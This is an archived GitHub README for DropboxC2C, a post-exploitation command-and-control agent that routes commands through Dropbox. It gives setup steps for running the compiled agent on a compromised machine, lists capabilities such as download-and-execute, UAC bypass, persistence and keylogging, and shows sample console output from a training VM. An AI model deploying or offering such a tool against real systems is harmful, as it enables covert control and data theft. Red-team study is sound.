

# GitHub - 0x09AL/DropboxC2C: DropboxC2C is a post-exploitation agent which uses Dropbox Infrastructure for command and control operations.

By 0x09AL

Archived: 2026-04-10 03:09:02 UTC

DropboxC2C is a post-exploitation agent which uses Dropbox Infrastructure for command and control operations.

DO NOT USE THIS FOR MALICIOUS PURPOSES. THE AUTHOR IS NOT RESPONSIBLE FOR ANY MISUSE OF THIS PROGRAM.

Dropbox-C2C is an old project of mine to use a thirdparty for command and control. Since the guys at Empire implemented dropbox as a C2C i am releasing this.

## Structure

- main.py - The "server" part which manages all the agents.
- agent.py - The "client" part which does what the server tells.

I have removed the keylogging functions so this doesn't get missused.

## Requirements

- Python 2.7
- Libraries
  - dropbox
  - psutil
  - pyinstaller

## Installation

1-) Clone the repository.

2-) Modify the API Key on agent.py and main.py # The api key must be created from the dropbox web interface.

3-) Run setup.bat on a Windows Machine. You will get agent.exe which is the "compiled" agent.

4-) Run main.py and run the agent on the compromised server.

Video Coming Soon



```
C2C#> (Training-PC-8796749520308SYS): help

Documented commands (type help <topic>):
=====
help

Undocumented commands:
=====
back      downloadexecute  keylog_dump    keylog_stop   sysinfo
bypassuac  exec             keylog_start   persist

C2C#> (Training-PC-8796749520308SYS):
```

Screenshot - 4

```
C2C#> (Training-PC-8796749520308SYS): exec whoami
C2C#> (Training-PC-8796749520308SYS): sysinfo
C2C#> (Training-PC-8796749520308SYS):
==== Agent Training-PC-8796749520308SYS Task: 4 ====
training-pc\training

==== Agent Training-PC-8796749520308SYS Task: 5 ====

Host Name:                TRAINING-PC
OS Name:                   Microsoft Windows 7 Professional
OS Version:                6.1.7601 Service Pack 1 Build 7601
OS Manufacturer:         Microsoft Corporation
OS Configuration:        Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:         Training
Registered Organization:
Product ID:                00371-177-0000061-85586
Original Install Date:    5/19/2017, 2:45:31 PM
System Boot Time:         6/24/2017, 2:11:41 PM
System Manufacturer:      innotek GmbH
System Model:              VirtualBox
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 61 Stepping 4 GenuineIntel ~2195 Mhz
BIOS Version:              innotek GmbH VirtualBox, 12/1/2006
Windows Directory:        C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:              en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory:     2,048 MB
Available Physical Memory: 1,233 MB
Virtual Memory: Max Size:  4,095 MB
Virtual Memory: Available: 3,278 MB
Virtual Memory: In Use:    817 MB
```